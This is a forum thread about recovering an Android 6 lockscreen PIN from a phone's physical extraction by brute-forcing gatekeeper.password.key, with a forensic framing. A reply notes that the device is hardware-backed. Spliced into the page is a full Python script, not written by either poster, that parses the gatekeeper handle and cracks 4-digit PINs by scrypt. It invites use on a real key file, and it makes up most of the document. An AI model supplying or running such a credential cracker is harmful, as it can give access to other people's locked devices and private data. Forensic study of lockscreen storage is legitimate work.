Decrypt Android 6 gatekeeper.password.key

 nic
(@nic)
Active Member
Joined: 4 years ago
Posts: 7
Topic starter  

Hi there,

I have a physical extraction from a Samsung Galaxy A3 2016 and I am trying to get the plaintext password.

This report describes how the Android 6.0 (and above) lockscreen passcode storage works:

https://nelenkov.blogspot.com/2015/06/password-storage-in-android-m.html

 

It seems that all the necessary files are available from this particular extraction:

- "device_policies.xml" tells me that it's a numeric 4-digit passcode

- "0" file (from /data/misc/gatekeeper) with a "scrypt"-encrypted string luckily replaces the hardware HMAC on this device

- "locksettings.db" contains the salt

- "gatekeeper.password.key" is the encrypted passcode

 

As far as I understand, I have to combine all possible passcode combinations (0000 - 9999) without the salt but with the content from the "0" file and compare the result with the hex string in "gatekeeper.password.key" to find/brute-force the correct passcode:

the 'signature' stored in the password handle file is indeed the scrypt value of the blob's version, the 64-bit secure user ID, and the blob's flags field, concatenated with the plaintext pattern value. The scrypt hash value is calculated using the stored 64-bit salt and the scrypt parameters N=16384, r=8, p=1. Password handles for PINs or passwords are calculated in the same way, using the PIN/password string value as input.

Is that correct? And if yes, how can I implement that?

It seems that the author successfully wrote a python script for that but unfortunately it's not attached.

It would be nice if somebody had an idea.

 

Thanks and have a nice weekend,

Nico

 

(@arcaine2)
Estimable Member
Joined: 9 years ago
Posts: 239
 

Those are only for non-hw-backed devices. The A3 2016 is hw-backed (check the last byte of the gatekeeper file: if it's 01), which means that you can't brute-force it.

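The procedure described in the first post, with the hardware-backed check from the reply, as an added example. This is not the script from the blog post and not code from either poster. It assumes the software gatekeeper handle layout implied by the quoted description: version (1 byte), 64-bit secure user ID, 64-bit flags, 64-bit salt, 32-byte scrypt signature, then a trailing hardware_backed byte, all packed little-endian; the salt is read from the handle itself, as the quote says. It also assumes the PIN reaches gatekeeper as its ASCII digit bytes. The sample handle is constructed by the script from a known PIN so it runs offline; point it at a real gatekeeper.password.key by passing the path.

```python
"""Brute-force a software-backed Android 6 gatekeeper.password.key handle.

Added example (not the blog's script). Assumed handle layout, packed LE:
  version(1) | secure user id(8) | flags(8) | salt(8) | signature(32) | hardware_backed(1)
  signature = scrypt(version|user_id|flags|credential, salt, N=16384, r=8, p=1)[:32]
"""
import hashlib
import struct
import sys
from typing import Iterable, Optional

SCRYPT_N, SCRYPT_R, SCRYPT_P = 16384, 8, 1   # parameters from the quoted description
SIG_LEN = 32
META_LEN = 1 + 8 + 8                          # version + user id + flags, prepended to the PIN
HANDLE_LEN = META_LEN + 8 + SIG_LEN + 1       # 58 bytes


def parse_handle(blob: bytes) -> dict:
    """Split a gatekeeper.password.key blob into its fields (assumed layout above)."""
    if len(blob) != HANDLE_LEN:
        raise ValueError(f"expected {HANDLE_LEN}-byte handle, got {len(blob)}")
    version, user_id, flags, salt = struct.unpack_from("<BQQQ", blob, 0)
    return {
        "version": version,
        "user_id": user_id,
        "flags": flags,
        "salt": salt,
        "signature": blob[META_LEN + 8:META_LEN + 8 + SIG_LEN],
        "hardware_backed": blob[-1] != 0,     # the "last byte 01" check from the reply
    }


def software_signature(blob: bytes, credential: bytes) -> bytes:
    """scrypt over version|user_id|flags|credential, salted with the handle's own 64-bit salt."""
    to_sign = blob[:META_LEN] + credential
    salt = blob[META_LEN:META_LEN + 8]
    return hashlib.scrypt(to_sign, salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=SIG_LEN)


def bruteforce(blob: bytes, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Return the candidate whose software signature matches the handle, or None.

    Hardware-backed handles are rejected up front: their signature is an HMAC under a
    key that never leaves the TEE, so no offline guessing can reproduce it.
    """
    h = parse_handle(blob)
    if h["hardware_backed"]:
        raise ValueError("hardware-backed handle (last byte 01): signature is a TEE HMAC, not scrypt")
    for cred in candidates:
        if software_signature(blob, cred) == h["signature"]:
            return cred
    return None


def numeric_pins(digits: int = 4) -> Iterable[bytes]:
    """All zero-padded numeric PINs of the given length as ASCII bytes (0000 .. 9999)."""
    for n in range(10 ** digits):
        yield f"{n:0{digits}d}".encode()


def make_software_handle(credential: bytes, user_id: int, salt: int,
                         version: int = 0, flags: int = 0) -> bytes:
    """CONSTRUCTED sample only: build a software handle for a known PIN (hardware_backed = 0)."""
    meta_and_salt = struct.pack("<BQQQ", version, user_id, flags, salt)
    sig = hashlib.scrypt(meta_and_salt[:META_LEN] + credential, salt=meta_and_salt[META_LEN:],
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=SIG_LEN)
    return meta_and_salt + sig + b"\x00"


if __name__ == "__main__":
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as f:       # a real gatekeeper.password.key
            blob = f.read()
    else:
        # constructed sample: arbitrary SID and salt, PIN 0013, so the search ends quickly
        blob = make_software_handle(b"0013", user_id=0x1122334455667788, salt=0x0123456789ABCDEF)
    h = parse_handle(blob)
    print(f"version={h['version']} sid={h['user_id']:#018x} flags={h['flags']:#x} "
          f"hardware_backed={h['hardware_backed']}")
    print("PIN:", bruteforce(blob, numeric_pins(4)))
```

With N=16384 each scrypt call costs tens of milliseconds, so the full 0000-9999 space takes a few minutes single-threaded; for an alphanumeric password or a pattern, feed `bruteforce` the corresponding candidate bytes instead of `numeric_pins`. If `parse_handle` reports `hardware_backed=True`, stop: the stored signature was produced inside the TEE and the scrypt path above does not apply.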

   
ReplyQuote
Share: